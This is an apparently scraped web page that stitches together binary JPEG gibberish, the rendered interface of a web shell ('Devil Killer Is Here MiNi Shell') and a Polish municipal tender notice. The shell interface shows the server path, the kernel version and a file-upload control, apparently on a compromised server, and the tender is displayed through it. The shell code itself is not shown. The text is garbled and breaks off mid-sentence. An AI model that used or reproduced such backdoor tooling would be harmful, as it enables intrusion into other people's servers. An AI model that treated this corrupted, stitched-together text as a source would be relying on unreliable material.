JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220509/0014932401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Modernizacja infrastruktury kulturalno-turystycznej w Radłowie i Nowych Karmonkach&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RADŁÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Oleska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-331</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343599005</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">343599005</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@radlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.radlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Modernizacja infrastruktury kulturalno-turystycznej w Radłowie i Nowych Karmonkach&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4dd1cb8e-cfa9-11ec-9ed6-82024ae9c4d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00149324</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00034002/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Modernizacja infrastruktury kulturalno - turystycznej w Radłowie i Nowych Karmonkach.ch</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>1.1. poprzez platformę miniPortal pod adresem: https://miniportal.uzp.gov.pl/ , wyłącznie w celu złożenia, zmiany, wycofania oferty za pośrednictwem stosownego Formularza;<br/>1.2. w zakresie innym niż wskazany w pkt 1.1. na adres elektroniczny Zamawiającego: przetargi@radlow.pl<br/>2.Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>4.1. w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym),<br/>4.2. w postaci elektronicznej (opatrzonej podpisem zaufanym lub podpisem osobistym)- wyłącznie poprzez miniPortal<br/>Szczegółowy opis w SWZ rozdział XIII.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający złożyć<br/>ofertę – zobowiązany jest zapoznać się z instrukcjami<br/>użytkowników miniPortalu – dostępnymi pod adresem https://miniportal.uzp.gov.pl/Instrukcje<br/>oraz zaakceptować regulamin korzystania z miniPortalu<br/>2. Złożenie oferty poprzez miniPortal oznacza akceptację regulaminu, o którym mowa w ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z miniPortalu – wskazane są na stronie<br/>internetowej miniPortalu: - pod adresem: https://miniportal.uzp.gov.pl/Instrukcje<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii i oświadczeń<br/>oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminu ePUAP.<br/>5. Wsparcie techniczne w zakresie działania miniPortalu Wykonawca może otrzymać pod nr tel. +48 22 458 77 06, +48 22 458 78<br/>75, e-mail: miniPortal@uzp.gov.pl od poniedziałku do piątku (dni robocze) w godz. 8:00 – 14:00.<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>7. Sposób złożenia oferty za pośrednictwem miniPortalu oraz potwierdzenia złożenia oferty zostały opisane w Instrukcjach<br/>użytkowników miniPortalu.<br/>8. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, pełnomocnictwo, sporządza się w postaci elektronicznej, w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 2070 z późn. zm.).<br/>9. W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, przekazywane przy użyciu środków<br/>komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>Ze względu na ograniczenie znaków szczegóły stanowią zapisy w SWZ Rozdział XIV</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej RODO), obowiązującego od 25 maja 2018r.,<br/>Zamawiający informuje, że:. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Radłów, adres administratora -<br/>UrządGminy Radłów, ul. Oleska 3, 46-336 Radłów.<br/>W jednostce przetwarzającej dane wyznaczona jest osoba nadzorująca przestrzeganie zasad ochrony danych; kontakt z<br/>Inspektorem Ochrony Danych możliwy jest pod adresem poczty elektronicznej (adres e-mail): iod@radlow.pl. Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. a, b, c, d, e ogólnego rozporządzenia Parlamentu Europejskiego i Rady<br/>UE o ochronie danych osobowych z dnia 27 kwietnia 2016 r. w celu:<br/>-wypełniania obowiązków prawnych ciążących na Urzędzie Gminy Radłów na podstawie powszechnie obowiązujących przepisów<br/>prawa,-realizacji zawartych przez Gminę Urząd Radłów umów z kontrahentami;- .w pozostałych przypadkach Pani/Pana dane<br/>osobowe przetwarzane są wyłącznie na podstawie udzielonej wcześniej zgody w zakresie i celu określonym w treści zgody.<br/>Odbiorcami Pani/Pana danych osobowych będą:<br/>-.organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działających na zlecenie organów władzy publicznej, w<br/>zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa,<br/>-inne podmioty, które na podstawie stosownych umów zawartych z Gminą Radłów lub z Urzędem Gminy Radłów przetwarzają dane<br/>osobowe dla których Administratorem jest Wójt Gminy Radłów,-podmioty działające w związku z realizacją własnych zadań jako<br/>Administrator Danych Osobowych, takie jak: operator pocztowy, bank, dostawca oprogramowania dziedzinowego.-.Pani/Pana dane<br/>osobowe przechowywane będą przez okres niezbędny do realizacji celu/celów określonych w pkt 3, lecz nie krócej niż przez okres<br/>wskazany w przepisach o archiwizacji lub innych przepisach prawa.--Ma Pani/Pan prawo do żądania od Administratora:-.dostępu do<br/>swoich danych oraz otrzymywania ich kopii,--.sprostowania (poprawiania) swoich danych,-.usunięcia danych, ograniczenia<br/>przetwarzania danych w przypadkach, gdy:- dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób<br/>przetwarzane;- dane osobowe przetwarzane są niezgodne z prawem,- dane osobowe muszą być usunięte w celu wywiązywania się<br/>z obowiązku wynikającego z przepisów prawa;- .osoba, której dane dotyczą kwestionuje prawidłowość danych osobowych;<br/>- Ma Pani/Pan także prawo do: -.wniesienia sprzeciwu wobec przetwarzania danych na podstawie uzasadnionego interesu<br/>Administratora – w takiej sytuacji Administrator zaprzestanie przetwarzać Pani/Pana dane w tym zakresie, chyba że będzie w stanie<br/>wykazać, że są one niezbędne do realizacji zadania narzuconego przez powszechnie obowiązujące prawo,-.przenoszenia danych,-<br/>.wniesienia skargi do organu nadzorczego,<br/>-. w celu skorzystania z praw określonych powyżej w pkt należy kontaktować się z Administratorem lub z Inspektorem Danych<br/>Osobowych.<br/>.Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, ilekroć w świetle posiadanej wiedzy o zakresie lub sposobie<br/>przetwarzania danych osobowych uzna Pani/Pan, że przetwarzanie Pani/Pana danych osobowych narusza przepisy ustawy o<br/>ochronie danych osobowych lub Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46 WE Pani/Pana dane osobowe mogą być przetwarzane w sposób zautomatyzowany. Pani/Pana dane<br/>osobowe nie będą profilowane.<br/>Szczegóły w SWZ rozdział XXX</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZPŚ.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje:<br/>Wykonanie robót budowlanych w ramach inwestycji pod nazwą:<br/>„Modernizacja infrastruktury kulturalno-turystycznej w Radłowie i Nowych Karmonkach.”<br/>2. W ramach przedmiotu zamówienia zostaną wykonane w szczególności następujące prace:<br/>2.1. w ramach części nazwanej:<br/>„Modernizacja świetlicy wiejskiej w Radłowie”:<br/>2.1.1. prace rozbiórkowe niezbędne do realizacji przedmiotu zamówienia,<br/>2.1.2. prace modernizacyjne, a w tym:<br/>2.1.2.1. wymianę stolarki okiennej i drzwiowej łącznie z parapetami,<br/>2.1.2.2. podział sali ścianą mobilną na dwie niezależne części,<br/>2.1.2.3. wykonanie wylewki samopoziomującej,<br/>2.1.2.4. wykonanie nowych posadzek,<br/>2.1.2.5. wykonanie nowych sufitów podwieszanych wraz z ociepleniem sufitu,<br/>2.1.2.6. wykonanie nowej instalacji elektrycznej,<br/>2.1.2.7. wykonanie nowej instalacji audiowizualnej w sali,<br/>2.1.2.8. wykonanie nowej instalacji centralnego ogrzewania,<br/>2.1.2.9. wykonanie izolacji przeciwwodnej na zewnątrz budynku, łącznie z opaską z grysu przy ścianie szczytowej<br/>budynku,2.1.2.10. wykonanie malowania elewacji oraz wnętrza budynku,<br/>2.1.2.11. wykonanie zadaszenia nad wejściem,<br/>2.1.2.12. wykonanie innych prac szczegółowo opisanych dokumentacji kosztorysowo - projektowej<br/>2.1.3. wyposażenie sali zgodnie z przedmiarem robót i dokumentacja projektową;<br/>2.2. w ramach części nazwanej:<br/>„Modernizacja Centrum Rekreacyjno-Sportowego w Nowych Karmonkach”<br/>2.2.1. prace rozbiórkowe niezbędne do realizacji przedmiotu zamówienia,<br/>2.2.2. prace modernizacyjne a w tym:<br/>2.2.2.1. częściowa wymiana konstrukcji dachowej,<br/>2.2.2.2. wykonanie pokrycia dachu wraz z obróbkami blacharskimi, rynnami i rurami spustowymi,<br/>2.2.2.3. wykonanie instalacji odgromowej,<br/>2.2.2.4. wykonanie przewodów wentylacyjnych,<br/>2.2.2.5. wykonanie fundamentów pod wiatę,<br/>2.2.2.6. wykonanie konstrukcji wiaty wraz z pokryciem i obróbkami blacharskimi,<br/>2.2.2.7. wymiana stolarki okiennej i drzwiowej łącznie z parapetami,<br/>2.2.2.8. ocieplenie ścian zewnętrznych budynku wraz z opaską,<br/>2.2.2.9. wykonanie sufitu podwieszanego wraz z dociepleniem,<br/>2.2.2.10. wykonanie częściowej nowej instalacji elektrycznej,<br/>2.2.2.11. wykonanie izolacji i posadzek,<br/>2.2.2.12. wykonanie innych prac szczegółowo opisanych w dokumentacji kosztorysowo – projektowej.<br/>3. Zamawiający posiada następujące ostateczne decyzje Starosty Oleskiego o zatwierdzeniu projektu budowlanego i<br/>udzieleniu pozwolenia na budowę:<br/>3.1. decyzję nr 205-IV/2021 z dnia 09 czerwca 2021 r. dotyczącą budowy wiaty/zadaszenia przy istniejącym budynku<br/>Centrum Rekreacyjno-Sportowego w miejscowości Karmonki Nowe, 46-331 Radłów na działce o nr ewid. gr. 859, jednostka<br/>ewidencyjna 160805_2 Radłów, obręb ewidencyjny 0032 Karmonki Nowe, funkcja – wiata, rodzaj zabudowy -<br/>rekreacyjnosportowa,<br/>3.2. decyzję nr 213-IV/2021 z dnia 11 czerwca 2021 r. dotyczącą przebudowy konstrukcji dachu budynku Centrum<br/>Rekreacyjno-Sportowego w Karmonkach Nowych, 46-331 Radłów na działce o nr ewid. gr. 859, jednostka ewidencyjna<br/>160805_2 Radłów, obręb ewidencyjny 0032 Karmonki Nowe, funkcja – centrum rekreacyjno-sportowe.<br/>4. Na inwestycję zostały opracowane następujące dokumentacje projektowe:<br/>4.1. Projekt budowlany opracowany przez zespół projektowy MB PROJEKT Marcin Bednarz sporządzony na „Przebudowę<br/>konstrukcji dachu budynku Centrum Rekreacyjno-Sportowego”,<br/>4.2. Projekt budowlany opracowany przez zespół projektowy MB PROJEKT Marcin Bednarz sporządzony na „Budowę<br/>wiaty/zadaszenia przy istniejącym budynku Centrum Rekreacyjno-Sportowego”,<br/>4.3. Projekt wykonawczy modernizacji świetlicy wiejskiej w Radłowie sporządzony przez mgr inż. Grażynę Chlebowską.<br/>4.4. Opracowanie projektowe Modernizacji świetlicy wiejskiej w Radłowie w zakresie wewnętrznej instalacji elektrycznej<br/>sporządzone przez inż. Piotra Wysockiego.<br/>5. Przedmiot zamówienia został szczegółowo opisany przedmiarem, dokumentacją projektową oraz specyfikacją techniczną<br/>wykonania i odbioru robót, stanowiącymi załącznik nr 9 do SWZ.<br/>6. Wykonawca zobowiązany jest zrealizować przedmiot zamówienia na zasadach i warunkach opisanych we wzorze umowy<br/>stanowiącym załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>1.1. cena ofertowa – 60 pkt,<br/>1.2. okres gwarancji jakości – 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w niniejszym postępowaniu dotyczące:<br/><br/>1.1. zdolności do występowania w obrocie gospodarczym - Zamawiający nie precyzuje w tym zakresie żadnych wymagań;<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunków w tym zakresie;<br/><br/>1.3. sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia warunków w tym zakresie;<br/><br/>1.4. zdolności technicznej lub zawodowej - Zamawiający będzie uważał za spełniony warunek posiadania zdolności technicznej lub zawodowej w zakresie potrzebnym do należytego wykonania przedmiotu zamówienia jeśli Wykonawca: <br/><br/>1.4.1. wykaże, że dysponuje zdolnością techniczną w zakresie doświadczenia poprzez wykazanie, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, obejmujące przebudowę dachu lub termomodernizację budynku o wartości co najmniej 800.000 zł brutto. Zamawiający wymaga, aby Wykonawca wykazał, że roboty budowlane wskazane w celu wykazania spełnienia warunków udziału w postępowaniu zostały wykonane należycie, w szczególności zgodnie z terminami umownymi.<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający uzna w/w warunek za spełniony jeśli przynajmniej jeden z wykonawców spełni w całości wymagany warunek samodzielnie,<br/><br/>1.4.2. wykaże, że dysponuje zdolnością zawodową w aspekcie zasobów osobowych poprzez wskazanie w załączniku nr 4 do SWZ (wskazanie kierownika budowy) osoby posiadającej:<br/><br/>1.4.2.1. uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-<br/>budowlanej bez ograniczeń oraz posiadającej co najmniej 5-letnie doświadczenie na<br/>stanowisku kierownika budowy w 